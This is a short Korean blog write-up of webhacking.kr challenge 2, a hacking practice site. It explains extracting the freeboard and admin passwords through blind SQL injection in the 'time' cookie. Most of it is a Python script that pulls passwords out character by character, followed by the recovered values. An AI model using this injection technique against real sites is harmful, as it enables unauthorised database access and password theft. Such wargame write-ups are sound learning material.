[webhacking.kr]2번-blindsql
shnec
2017. 2. 19. 17:51
table명은 게싱으로 알아낸다.
freeboard와 admin의 password를 blind SQL injection으로 알아낸 뒤, board에서 주는 zip 파일을 admin page에 admin 비밀번호를 넣고 받은 비밀번호로 압축 해제하면 key를 얻는다.
#webhacking.kr 2번 import http.client import urllib import string def inj(q): con=http.client.HTTPConnection('webhacking.kr') head={'Host':'webhacking.kr'} head['Upgrade-Insecure-Requests']=1 head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q con.request('GET','/challenge/web/web-02/',headers=head) r=con.getresponse().read() #print(r) return b'09:00:01' in r #print(inj('(select length(password) from admin)=10;')) arr=list(string.ascii_letters+'1234567890') print(arr) adminpw='' table='admin' #FreeB0aRd for i in range(5,6): for a in range(95,100): q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';' print(q) t=inj(q) print(chr(a)) print(t) if t: adminpw+=a print(adminpw) break for i in range(5,11): for j, a in enumerate(arr): q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';' print(q) t=inj(q) print(a) if t: adminpw+=a print(adminpw) break print(adminpw) adminpw='0nly_admin' freeboardpw='7598522ae'